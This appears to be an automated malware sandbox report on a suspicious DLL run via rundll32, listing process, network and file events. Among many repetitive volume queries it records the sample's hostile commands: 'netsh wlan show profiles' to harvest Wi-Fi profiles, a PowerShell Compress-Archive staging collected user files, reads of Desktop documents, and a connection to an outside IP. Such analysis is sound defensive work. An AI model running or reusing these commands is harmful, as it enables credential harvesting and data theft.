    Source: netsh.exe, 00000005.00000002.1731533216.000000000141A000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000007.00000003.1731513760.0000000000701000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
    Source: netsh.exe, 00000010.00000002.1793036288.00000000013EA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllrr
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

    HIPS / PFW / Operating System Protection Evasion

    barindex
    System process connects to network (likely due to code injection or exploit)
    Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 185.215.113.217 80Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\0j6nSbUQQS.dll",#1Jump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel OptimalJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel OptimalJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profilesJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel OptimalJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\LTKMYBSEYZ.docx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\NWTVCDUMOB.docx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\NWTVCDUMOB.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\YPSIACHYXW.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\LTKMYBSEYZ.docx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\NWTVCDUMOB.docx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\NWTVCDUMOB.xlsx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\LTKMYBSEYZ.docx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\Users\user\Desktop\NWTVCDUMOB.docx VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\netsh.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
